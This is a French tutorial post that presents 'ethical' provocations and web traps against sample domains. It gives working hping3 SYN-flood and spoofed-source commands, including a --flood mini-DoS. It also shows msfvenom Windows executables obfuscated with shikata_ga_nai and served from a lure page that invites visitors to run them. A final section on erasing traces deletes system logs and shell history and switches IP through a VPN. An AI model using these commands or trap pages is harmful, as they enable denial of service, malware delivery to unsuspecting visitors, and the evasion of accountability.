📖 CINQ MÉTHODES POUR TITILLER ET PIÉGER – ÉTHIQUE ET TECHNIQUE

Ce tuto simule des réponses à des "intrusions" fictives sur notre réseau, notre présence sociale, ou notre ligne téléphonique. On explore cinq scénarios distincts, chacun avec une méthode de titillage (provocation réseau ou autre) et un honeypot (piège web) adapté. L’objectif : attirer l’attention d’un adversaire fictif, le piéger s’il réagit, et lui envoyer un message éducatif sans causer de dégât. On finit en mode fantôme, avec une section détaillée sur l’effacement des traces sous Kali. Tout est pensé pour être clair, technique, et fidèle à notre philosophie Platon-y : brut, malin, et éthique.

SOMMAIRE

1️⃣ INTRODUCTION

Ce tuto, c’est pas une balade. On titille des cibles fictives, on tend des pièges subtils, et on laisse une trace éducative pour ceux qui osent nous suivre. Éthique avant tout, mais avec des griffes acérées. Que ce soit un réseau, un réseau social, ou une ligne téléphonique, on répond avec style et puissance. Les curieux tomberont dans nos filets, et les leçons resteront. Prépare-toi – c’est notre terrain de chasse !

⚠️ LÉGAL ONLY : Teste en lab sécurisé avec tes propres machines. Toute action non autorisée, c’est la cage – pas pour nous !

Que la traque commence !

2️⃣ PRÉPARATION COMMUNE – L’ARSENAL

Voici le setup pour dominer :

INSTALLATION DÉTAILLÉE


sudo apt update && sudo apt install hping3 metasploit-framework python3 curl sipsak
                    

Vérifie : hping3 -v, python3 --version, msfconsole -v.


mkdir /platon-y/UnchainedLab && cd /platon-y/UnchainedLab
                    

Création du lab pour tout organiser.

3️⃣ CAS 1 – SUBTILITÉ SUR EXAMPLE.COM

Cible : example.com (IP fictive : 93.184.216.34).

Style : Titillage discret via HTTPS, honeypot minimaliste avec logs et fingerprinting.

TITILLAGE AVEC HPING3


sudo hping3 -S -p 443 -c 50 -i u2000 --rand-source 93.184.216.34
                    

Détails :
-S : Paquets SYN pour simuler une connexion TCP.
-p 443 : HTTPS, port sécurisé.
-c 50 : 50 paquets, discret pour éviter IDS.
-i u2000 : Intervalle de 2ms, furtif.
--rand-source : Spoofing léger (aléatoire en lab).
Effet : Logué comme scan anodin.
Analyse : tcpdump -i eth0 -n port 443 -w subtle.pcap, puis wireshark subtle.pcap.

HONEYPOT MINIMALISTE


# subtle.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import time
import socket

class SubtleHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        attacker_ip = self.client_address[0]
        attacker_port = self.client_address[1]
        headers = self.headers
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.send_header("Server", "Platon-y/1.0")
        self.end_headers()

        user_agent = headers.get('User-Agent', 'Inconnu')
        host = headers.get('Host', 'Inconnu')
        timestamp = time.strftime("%Y-%m-%d %H:%M:%S")

        html = f"""
        <html>
        <body style="background: #1a1a3d; color: #00CED1; font-family: monospace;">
        <h1>Platon-y Unchained</h1>
        <p>IP détectée : {attacker_ip}:{attacker_port}</p>
        <p>User-Agent : {user_agent}</p>
        <p>T’as vu mon petit coucou réseau sur 93.184.216.34 ?</p>
        <p>Example.com, pourquoi sniffer mon espace ? Sécurise-toi mieux !</p>
        <p>Timestamp : {timestamp}</p>
        </body>
        </html>
        """
        self.wfile.write(html.encode())
        with open("subtle.log", "a") as log:
            log.write(f"[{timestamp}] IP: {attacker_ip}:{attacker_port} | UA: {user_agent} | Host: {host}\n")
        print(f"Visiteur subtil : {attacker_ip} | {user_agent}")

port = 8081
server = HTTPServer(("0.0.0.0", port), SubtleHandler)
print("Honeypot subtil actif sur http://0.0.0.0:8081")
server.serve_forever()
                    

Lancement : python3 subtle.py
Détails :
- HTML échappé avec < et > pour affichage brut.
- Variables dynamiques gérées dans la `f-string`.
- Logs dans subtle.log.
Effet : Page discrète qui note et éduque.
Bonus : tail -f subtle.log.

4️⃣ CAS 2 – AGRESSIVITÉ SUR TEST.COM

Cible : test.com (IP fictive : 192.0.2.1).

Style : Flood visuel via HTTP, honeypot chaotique avec simulation DoS.

TITILLAGE AVEC HPING3


sudo hping3 -S -p 80 -c 200 -i u500 --flood 192.0.2.1
                    

Détails :
-p 80 : HTTP, port exposé.
-c 200 : 200 paquets (limite facultative avec --flood).
-i u500 : 0,5ms, rapide.
--flood : Mode agressif, max SYN.
Effet : Sature les logs, simule un mini-DoS.
Analyse : tcpdump -i eth0 -n port 80.

HONEYPOT CHAOTIQUE


# glitch.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import random
import time

class GlitchHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        attacker_ip = self.client_address[0]
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.send_header("X-Platon-y", "Chaos activé")
        self.end_headers()

        time.sleep(random.uniform(0.5, 2))  # Latence aléatoire

        html = f"""
        <html>
        <body style="background: #0d0d1a; color: #FF4500; font-family: 'Courier New', monospace; text-align: center;">
        <h1 style="animation: glitch 0.3s infinite; text-shadow: 0 0 15px #FF4500;">Platon-y Unchained</h1>
        <p>IP : {attacker_ip}</p>
        <p>Mon burst sur 192.0.2.1 t’a réveillé, hein ?</p>
        <p>Test.com, arrêtez de fouiner ou sécurisez mieux vos systèmes !</p>
        <script>
            alert("Platon-y te secoue – Respectez mon réseau !");
            setInterval(() => {{ document.body.style.filter = `hue-rotate(${{Math.random()*360}}deg)`; }}, 100);
            setTimeout(() => {{ window.location.reload(); }}, 5000);
        </script>
        </body>
        <style>
            @keyframes glitch {{ 0% {{ transform: skew(0); }} 20% {{ transform: skew(5deg); }} 40% {{ transform: skew(-5deg); }} 60% {{ transform: skew(5deg); }} 80% {{ transform: skew(-5deg); }} 100% {{ transform: skew(0); }} }}
        </style>
        </html>
        """
        self.wfile.write(html.encode())
        print(f"Visiteur glitché : {attacker_ip}")

port = 8082
server = HTTPServer(("0.0.0.0", port), GlitchHandler)
print("Honeypot chaotique actif sur http://0.0.0.0:8082")
server.serve_forever()
                    

Lancement : python3 glitch.py
Détails :
- HTML échappé pour affichage brut.
- Latence aléatoire + glitch visuel.
Effet : Page agressive qui perturbe.
Bonus : iptables -A INPUT -p tcp --dport 8082 -j LOG.

5️⃣ CAS 3 – SOURNOISERIE SUR DUMMY.ORG

Cible : dummy.org (IP fictive : 198.51.100.1).

Style : Titillage furtif via SSH, honeypot avec payload obfuscé.

TITILLAGE AVEC HPING3


sudo hping3 -S -p 22 -c 75 -i u1500 --spoof 10.0.0.1 198.51.100.1
                    

Détails :
-p 22 : SSH, cible sensible.
-c 75 : 75 paquets, discret.
-i u1500 : 1,5ms, lent pour éviter IDS.
--spoof 10.0.0.1 : Fausse IP (lab only).
Effet : Logué comme tentative suspecte.
Analyse : tcpdump -i eth0 -n port 22.

PAYLOAD METASPLOIT


msfvenom -p windows/exec CMD="msg * Platon-y Unchained : Pourquoi sniffer mon réseau ? Dummy.org, sécurisez vos systèmes !" -f exe -o traque.exe
msfvenom -p windows/exec CMD="msg * Platon-y Unchained : Pourquoi sniffer mon réseau ? Dummy.org, sécurisez vos systèmes !" -f exe -e x86/shikata_ga_nai -i 5 -o traque_obf.exe
python3 -m http.server 8080
                    

Détails :
- Payload simple et obfuscé (Shikata Ga Nai, 5 itérations).
- Serveur sur http://TON_IP:8080/.
Effet : Message éducatif sur Windows.

HONEYPOT SOURNOIS


# sneaky.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import hashlib

class SneakyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        attacker_ip = self.client_address[0]
        headers = self.headers
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.send_header("X-Platon-y", "Piège tendu")
        self.end_headers()

        user_agent = headers.get('User-Agent', 'Inconnu')
        payload_url = "http://TON_IP:8080/traque_obf.exe"
        ip_hash = hashlib.sha256(attacker_ip.encode()).hexdigest()[:8]

        html = f"""
        <html>
        <body style="background: #000; color: #39FF14; font-family: 'Courier New', monospace; text-align: center;">
        <h1 style="animation: pulse 1s infinite;">Platon-y Unchained</h1>
        <p>ID Visiteur : {ip_hash}</p>
        <p>User-Agent : {user_agent}</p>
        <p>Mon hping3 sur 198.51.100.1 t’a eu ?</p>
        <p>Dummy.org, pourquoi mon iptables ? Sécurise-toi !</p>
        <p><a href="{payload_url}" style="color: #FF4500;">Un petit cadeau pour vos Windows – clique si t’oses.</a></p>
        <script>alert("Platon-y te voit – Respectez mon réseau !");</script>
        </body>
        <style>
            @keyframes pulse {{ 0%, 100% {{ opacity: 1; }} 50% {{ opacity: 0.5; }} }}
        </style>
        </html>
        """
        self.wfile.write(html.encode())
        print(f"Visiteur sournois : {attacker_ip} | Hash: {ip_hash}")

port = 8083
server = HTTPServer(("0.0.0.0", port), SneakyHandler)
print("Honeypot sournois actif sur http://0.0.0.0:8083")
server.serve_forever()
                    

Lancement : python3 sneaky.py
Détails :
- HTML échappé.
- Hash IP pour tracking.
- Payload obfuscé.
Effet : Page menaçante avec piège.
Bonus : netstat -tulnp | grep 8083.

6️⃣ CAS 4 – RÉSEAU SOCIAL SUR FAKEBOOK.COM

Cible : fakebook.com (IP fictive : 203.0.113.1).

Style : Titillage via HTTP, honeypot social avec tracking.

TITILLAGE AVEC CURL


curl -A "Platon-y_Unchained - Pourquoi sniffer mon réseau ?" -H "X-Forwarded-For: 10.0.0.2" --connect-timeout 5 http://203.0.113.1
                    

Détails :
-A : User-Agent personnalisé.
-H "X-Forwarded-For" : Spoofing IP (lab only).
--connect-timeout 5 : Timeout rapide.
Effet : Logué comme requête suspecte.
Analyse : curl -I http://203.0.113.1.

HONEYPOT SOCIAL


# social.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import time

class SocialHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        attacker_ip = self.client_address[0]
        headers = self.headers
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()

        user_agent = headers.get('User-Agent', 'Inconnu')
        timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
        data = {"ip": attacker_ip, "ua": user_agent, "time": timestamp}
        with open("social.json", "a") as log:
            log.write(json.dumps(data) + "\n")

        html = f"""
        <html>
        <body style="background: #1c2526; color: #FFD700; font-family: 'Arial', sans-serif; text-align: center;">
        <h1 style="font-size: 2em;">Platon-y Unchained</h1>
        <p>IP détectée : {attacker_ip}</p>
        <p>T’as vu ma requête sur 203.0.113.1 ?</p>
        <p>Fakebook.com, arrêtez de fouiner – sécurisez vos profils !</p>
        <p style="color: #FF4500;">Message privé : Respectez mon espace.</p>
        <script>
            alert("Platon-y te follow – Laissez-moi tranquille !");
            fetch('https://api.ipify.org?format=json').then(r => r.json()).then(d => console.log('IP réelle:', d.ip));
        </script>
        </body>
        </html>
        """
        self.wfile.write(html.encode())
        print(f"Visiteur social : {attacker_ip} | {user_agent}")

port = 8084
server = HTTPServer(("0.0.0.0", port), SocialHandler)
print("Honeypot social actif sur http://0.0.0.0:8084")
server.serve_forever()
                    

Lancement : python3 social.py
Détails :
- HTML échappé.
- Logs JSON dans social.json.
- Fetch IP réelle (console).
Effet : Page sociale qui tracke.
Bonus : cat social.json | jq ..

7️⃣ CAS 5 – TÉLÉPHONE SUR PHONE.EXAMPLE.NET

Cible : phone.example.net (IP fictive : 162.168.1.1).

Style : Titillage via SIP, honeypot téléphonique avec audio.

TITILLAGE AVEC SIPSAK


sipsak -s sip:platon-y@162.168.1.1 -v -H "From: <sip:unchained@platon-y.fr>" -m "Platon-y vous appelle"
                    

Détails :
-s : URI SIP fictive.
-v : Verbeux.
-H : Header From personnalisé.
-m : Message SIP.
Effet : Logué comme appel suspect.
Analyse : wireshark -f "sip" -i eth0.

HONEYPOT TÉLÉPHONIQUE


# phone.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import base64

class PhoneHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        attacker_ip = self.client_address[0]
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()

        # Audio base64 (exemple court, remplace par un vrai WAV)
        audio_b64 = "data:audio/wav;base64,UklGRiQAAABXQVZFZm10IBAAAAABAAEARKwAAIhYAQACABAAZGF0YQAAAAA="

        html = f"""
        <html>
        <body style="background: #0a0f0d; color: #8A2BE2; font-family: 'Courier New', monospace; text-align: center;">
        <h1 style="animation: ring 2s infinite;">Platon-y Unchained Calling</h1>
        <p>IP : {attacker_ip}</p>
        <p>Mon SIP sur 162.168.1.1 t’a sonné ?</p>
        <p>Phone.example.net, pourquoi mon réseau ? Sécurisez vos lignes !</p>
        <p style="color: #FF4500;">Écoute ça :</p>
        <audio controls autoplay>
            <source src="{audio_b64}" type="audio/wav">
        </audio>
        <script>alert("Platon-y te rappelle – Laissez mon espace tranquille !");</script>
        </body>
        <style>
            @keyframes ring {{ 0% {{ transform: rotate(0); }} 10% {{ transform: rotate(5deg); }} 20% {{ transform: rotate(-5deg); }} 30% {{ transform: rotate(5deg); }} 40% {{ transform: rotate(-5deg); }} 100% {{ transform: rotate(0); }} }}
        </style>
        </html>
        """
        self.wfile.write(html.encode())
        print(f"Visiteur téléphonique : {attacker_ip}")

port = 8085
server = HTTPServer(("0.0.0.0", port), PhoneHandler)
print("Honeypot téléphonique actif sur http://0.0.0.0:8085")
server.serve_forever()
                    

Lancement : python3 phone.py
Détails :
- HTML échappé.
- Audio Base64 (remplace par base64 file.wav > audio.txt).
Effet : Page violette avec son.
Bonus : curl http://localhost:8085.

8️⃣ SCÉNARIO GLOBAL – LA CHASSE

Ouvre 6 terminaux : un par script Python + titillages.

9️⃣ MODE FANTÔME – EFFACER LES TRACES

Disparais comme un loup dans la nuit :

ARRÊTER LES SERVICES


pkill python3  # Tue honeypots et serveur
pkill msfconsole  # Si utilisé
                    

Coupe toute activité réseau.

CHANGER D’IP


protonvpn-cli connect  # Nouvelle IP via VPN
                    

Alternative : Reboot routeur.

EFFACER LES LOGS SYSTÈME


sudo rm -f /var/log/kern.log /var/log/syslog /var/log/messages
sudo systemctl restart rsyslog
sudo rm -f /var/log/ufw.log  # Si pare-feu actif
                    

Supprime traces réseau.

EFFACER L’HISTORIQUE


history -c  # Vide mémoire
rm -f ~/.bash_history  # Supprime fichier
                    

NETTOYER FICHIERS


rm -f /platon-y/UnchainedLab/*.log
rm -f /platon-y/UnchainedLab/troll.exe
rm -f /platon-y/UnchainedLab/*.py
                    

VIDER MÉMOIRE


sudo sync && sudo sysctl -w vm.drop_caches=3
                    

Vérifie : ls -la /var/log/, whoami; date.

🔟 CONCLUSION

Cinq approches uniques :

Teste en lab, respecte la loi, disparais comme un nomade. Platon-y Unchained laisse des leçons, pas des traces ! Ou alors s’est voulu 😘.